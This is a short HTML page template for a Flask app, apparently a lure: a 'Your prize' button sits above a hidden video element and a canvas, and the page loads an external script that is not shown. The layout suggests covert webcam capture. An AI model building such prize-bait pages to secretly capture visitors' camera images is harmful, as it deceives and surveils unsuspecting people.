<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>emboy</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
  <div class="container">
    <h2 id="H1">CLICK BUTTON</h2>
    <button class="glow-on-hover" type="button" id="hover-button">Your prize🤩</button>
  </div>
  
  <video id="video" width="320" height="240" style="display: none;"></video>
  <canvas id="canvas" width="320" height="240"></canvas>
  
  <script src="{{ url_for('static', filename='javascript.js') }}"></script>
</body>
</html>
